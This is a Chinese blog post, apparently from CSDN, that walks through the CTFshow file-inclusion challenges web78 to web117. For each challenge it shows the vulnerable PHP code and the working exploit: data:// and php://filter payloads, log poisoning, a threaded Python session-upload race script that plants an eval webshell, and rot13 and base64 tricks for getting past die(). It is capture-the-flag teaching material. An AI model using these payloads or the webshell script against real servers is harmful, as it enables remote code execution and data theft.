CTFSHOW文件包含

已于 2022-04-08 21:10:17 修改
阅读量4.5k 收藏 14
点赞数 1
分类专栏: CTFSHOW 文章标签: 安全 web
于 2022-04-06 21:49:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yb_140/article/details/123672286
版权

服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)

文件包含函数:

函数区别
require()在包含的过程中如果出现错误,会直接报错并退出程序的执行
include()在包含的过程中如果出现错误,会抛出一个警告,程序继续正常运行
require_once()和require函数相同,但只包含一次
include_once()和include函数相同,但只包含一次

web78

if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

没有任何的过滤

?file=data://text/plain,<?php system("cat flag.php");?>

data://伪协议

这里的text/plain表示的是文本

也可以text/plain;base64,若纯文字没用可用base64编码

 可以参考:CTF常用伪协议总结_Asionm的博客-CSDN博客_ctf伪协议

web79

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

这里把php替换成了???

可以采用上面说到的base64编码绕过

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZmxhZy5waHAiKTs/Pg==

web80

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

替换了php和data

这里可以进行日志包含:通过User-Agent头部注入命令:

然后将日志包含进去,并通过POST参数执行命令:

?file=/var/log/nginx/access.log

找到

a=system('cat fl0g.php');

仔细观察即可得到flag

总:

//日志包含
/?file=/var/log/nginx/access.log
//命令执行
a=system('ls');
a=system('cat fl0g.php');

web81

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了php,data,:

可以和上一题一样

web82

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

在cookie处添加PHPSESSID,这样提交的话会在默认session目录下生成类似于sess_aaa的文件,默认临时目录为/tmp/sess_aaa,这个文件名字是我们可以控制的

控制里面的内容需要PHP_SESSION_UPLOAD_PRGRESS参数,是用来获取实时文件的上传进度,它会返回一个session,用来实现写入的内容

脚本:

#-- coding:UTF-8 --

import io
import requests
import threading
url = 'http://616ed007-24be-4e42-9bc8-7fcbc8bfd49c.challenge.ctf.show/'
sessionid='ctfshow'
data={
    "1":"file_put_contents('/var/www/html/1.php','<?php eval($_POST[2]);?>');"
}

def write(session):
    fileBytes=io.BytesIO(b'a' * 1024 * 50)
    while True:
        response=session.post(
            url,
            data={
                'PHP_SESSION_UPLOAD_PROGRESS': '<?php eval($_POST[1]);?>'
            },
            cookies={
                'PHPSESSID':sessionid
            },
            files={
                'file':('ctfshow.jpg',fileBytes)
            }
        )
def read(session):
    while True:
        response = session.post(url+'?file=/tmp/sess_'+sessionid,data=data,
                                cookies={
                                    'PHPSESSID':sessionid
                                }
                                )
        response2=session.get(url+'1.php')
        if response2.status_code==200:
            print('++++++++++++done++++++++++++')
        else:
            print(response2.status_code)

if __name__ == '__main__':
    evnet=threading.Event()
    with requests.session() as session:
        for i in range(5):
            threading.Thread(target=write,args=(session,)).start()
        for i in range(5):
            threading.Thread(target=read,args=(session,)).start()
    evnet.set()

web83

session_unset();
session_destroy();

if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);

    include($file);
}else{
    highlight_file(__FILE__);
}

利用session文件包含

来自:Ctfshow Web入门 - 文件包含总结 - ch0bits - 博客园

写一个POST网页

<!DOCTYPE html>
<html>
<body>
<form action="http://44a86596-324d-4eaa-8051-6e323bd0814a.challenge.ctf.show/" method="POST" enctype="multipart/form-data">
    <input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('ls');?>" />
    <input type="file" name="file" />
    <input type="submit" value="submit" />
</form>
</body>
</html>

创建一个1.html,写入上面的代码

搭建本地环境,进入1.html,上传的文件随意

使用bp抓包

在cookie处添加:PHPSESSID=flag,PHP将会在服务器上创建一个文件:/tmp/sess_flag

发送到爆破模块,以上为第一个包

来到题目页面,传参?file=/tmp/sess_flag,同时抓包

发送到爆破模块。为第二个包

两个同时开始发包

访问fl0g.php即可

即可得到flag

或者上题的脚本还是可以使用的

web84-86

同上

web87

题目中的die是绕过的重点

方法1

对其使用base64解码绕过

?file=php://filter/write=convert.base64-decode/resource=flag.php

 然后对content写入的内容进行base64编码

base64解码时,是4个为一组,flag.php的内容<?php die('大佬别秀了');?>中phpdie会参与base64解码,因为phpdie只有6个字节,补两个a就是8字节了

总结:我们要在content中写入shell,然后base64编码
content=<?php system('tac f*.php');?>

base64

content=PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

写入的文件内容

<?php die('大佬别秀了');?>PD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

补两个a

content=aaPD9waHAgc3lzdGVtKCd0YWMgZioucGhwJyk7Pz4=

对file进行两次url全编码

%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%36%33%25%36%46%25%36%45%25%37%36%25%36%35%25%37%32%25%37%34%25%32%45%25%36%32%25%36%31%25%37%33%25%36%35%25%33%36%25%33%34%25%32%44%25%36%34%25%36%35%25%36%33%25%36%46%25%36%34%25%36%35%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%36%36%25%36%43%25%36%31%25%36%37%25%32%45%25%37%30%25%36%38%25%37%30

传参

然后访问flag.php即可 

方法2

使用rot13,原理和方法一类似

对content中的所有内容进行rot13编码加密,从而绕过die

<?php system('tac f*.php');?>

使用rot13编码后

<?cuc flfgrz('gnp s*.cuc');?>
?file=php://filter/write=string.rot13/resource=1.php

 进行两次URL全编码

%25%37%30%25%36%38%25%37%30%25%33%41%25%32%46%25%32%46%25%36%36%25%36%39%25%36%43%25%37%34%25%36%35%25%37%32%25%32%46%25%37%37%25%37%32%25%36%39%25%37%34%25%36%35%25%33%44%25%37%33%25%37%34%25%37%32%25%36%39%25%36%45%25%36%37%25%32%45%25%37%32%25%36%46%25%37%34%25%33%31%25%33%33%25%32%46%25%37%32%25%36%35%25%37%33%25%36%46%25%37%35%25%37%32%25%36%33%25%36%35%25%33%44%25%33%31%25%32%45%25%37%30%25%36%38%25%37%30

 传参

然后访问1.php

web88

考察过滤后进行包含

但是这里没有过滤冒号

直接使用伪协议

?file=data://text/plain;base64,<?php system('tac *.php');?>

对<?php system('tac *.php');?>进行base64编码

PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/Pg==

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/Pg==

但是这里的=被过滤

可以在前面的基础上加一点东西

<?php system('tac *.php');?>aa

PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PmFh

?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgKi5waHAnKTs/PmFh

web116

?file=flag.php

抓包

web117

和87类似

这里过滤了base64和rot13

?file=php://filter/write=convert.iconv.UCS-2LE.UCS-2BE/resource=a.php
post:contents=?<hp pvela$(P_SO[T]1;)>?

 

访问a.php,然后传参

1=system('tac flag.php');

得到flag

超级兵_140
关注
  • 1
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
Web安全主要关注Web应用中的漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞等。PHP是一种广泛使用的服务器端脚本语言,常用于构建动态网页,因此,理解PHP语法和特性对于解决这类问题至关重要。 【压缩包子文件...
隐写_Jphswin_ctfshow.rar
08-26
这个压缩包文件“隐写_Jphswin_ctfshow.rar”显然包含了这个工具的可执行文件,很可能用于参加类似于CTF(Capture The Flag)的信息安全竞赛或挑战。 Jphswin是一个基于JPEG图片的隐写工具,它利用JPEG文件格式的...
ctfshow---文件包含
fainpo的博客
03-20 684
伪协议读取即可。
ctfshow文件包含
Vincent0sen的博客
11-13 1188
解法一 - php://input解法二 - data://
2024年网络安全最全CTFShow-MISC入门篇详细wp(1-56)_ctfshow misc入门,为什么网络安全要采用Binder作为IPC机制
最新发布
2401_84264727的博客
05-11 1020
magicexif元数据编辑器是一款非常专业的照片magicexif元数据编辑器,该软件可以通过分析照片的元数据以及编码特征来计算图像可信度,从而判断照片是否被修改,同时还能对相机的快门次数、镜头参数、光圈档位等进行查看和编辑。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~
CTFSHOW-文件包含
m0_74606212的博客
03-24 394
CTFSHOW-文件包含
ctfshow 每周大挑战 极限命令执行
m0_64815693的博客
02-12 3911
ctfshow 每周大挑战 极限命令执行 wp
CTFshow web 文件包含
m0_56993542的博客
10-18 385
web 78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 文件包含伪协议,没有过滤。 ?file=php://filter/read=convert.base64-encode/resource=flag.php 拿到flag的base64编码,直接去解码。 web 79 if(isset($_GET['file'])){
PHP特性(网友根据ctfshow整理)1
08-03
在处理文件路径时,PHP有时会允许相对路径或者伪协议(如`file://`)的使用,这可能引发安全风险,如文件包含漏洞。开发者应当谨慎处理文件路径,避免潜在的安全问题。 3. **三目运算符`?:`的理解与变量覆盖**: ...
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTFShow-周末大挑战parse-url篇Writeup
05-19
这些关卡展示了URL解析漏洞的多种利用方式,包括命令注入、数据编码绕过过滤、多语言代码执行等。防范这些攻击的关键在于对用户输入进行严格的验证和过滤,避免将不受信任的数据直接传递给解释器执行。开发者应遵循...
html制作帮助工具
09-05
CHM是一种由微软开发的、包含HTML页面的压缩文件格式,广泛用于Windows平台上的软件帮助系统。它将多个HTML页面、图像和其他资源打包在一起,用户可以通过内置的索引和搜索功能快速访问相关信息。 EasyCHM是这样一...
CTF爆破CRC32.zip
02-05
在网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,它涉及到各种技术挑战,包括密码学、逆向工程、网络嗅探等。本话题聚焦于CRC32爆破,这是CTF赛事中常见的一个技术环节。CRC32,全称Cyclic ...
捌柒注音注音输入的曲线救国解决方案
08-12
字典库包含了大量汉字与其对应的注音,这通常是以JSON或其他数据格式存储的。当用户输入注音后,程序会通过算法快速查找并匹配相应的汉字,然后显示在输入框中。这个过程需要高效的字符串搜索和比较技巧,以确保在短...
qixi_love:七夕web动画演示
05-15
在"qixi_love-master"这个压缩包中,包含了项目的所有源代码和资源文件。解压后,我们可以深入研究代码结构,学习如何将JavaScript与HTML和CSS结合起来,创建出富有创意和情感的Web动画。这不仅是一个七夕的庆祝作品...
2021-鹏城实验室-pwn-babyheap.zip
09-28
在"Pwn-BabyHeap"中,提供的libc.so.6文件是静态编译的库文件,我们可以对其进行分析,寻找关键函数的地址,这对于构造payload至关重要。同时,我们需要分析babyheap程序的行为,理解其内存管理机制,找到合适的漏洞...
CTFshow 1-10关
weixin_62369433的博客
11-11 2172
CTFshow 1-10 通关详解
ctfshow文件包含-超详解
qq_50589021的博客
08-05 1932
文件包含 web78-79 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?> 伪协议: ?file=php://filter/read=convert.base64-encode/resource=flag.php ?file=data://text/plain;base64,PD9waHAgc3lzd
ctfshow 文件包含
07-28
- *1* *2* *3* [ctfshow文件包含](https://blog.csdn.net/njh18790816639/article/details/115582591)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值